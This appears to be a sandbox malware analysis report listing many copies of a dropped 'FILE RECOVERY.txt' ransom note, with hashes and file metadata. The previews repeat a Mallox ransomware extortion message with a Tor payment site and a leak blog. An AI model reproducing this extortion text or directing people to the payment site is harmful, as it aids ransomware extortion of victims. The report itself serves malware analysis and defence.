                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\de-CH\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\de-DE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\de-LI\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\de-LU\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
